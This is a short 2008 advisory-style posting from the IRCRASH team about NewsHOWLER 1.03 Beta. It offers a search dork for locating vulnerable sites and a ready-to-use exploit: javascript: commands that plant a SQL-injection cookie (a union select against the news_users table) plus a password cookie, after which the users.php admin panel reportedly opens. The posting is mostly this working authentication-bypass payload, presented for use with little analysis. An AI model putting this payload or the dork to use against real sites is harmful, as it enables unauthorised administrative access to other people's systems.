NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

2008-08-18T00:00:00
ID SECURITYVULNS:DOC:20380
Type securityvulns
Reporter Securityvulns
Modified 2008-08-18T00:00:00

Description

NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))

Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))

Our Site : Http://IRCRASH.COM

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)

Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz

DORK : "Net Dupe © 2002. All Rights Reserved"

[Exploit]

javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";

javascript:document.cookie = "news_password=3; path=/";

Then if u open http://Site/users.php u can see the admin panel ;)

Site : Http://IRCRASH.COM

################################ TNX GOD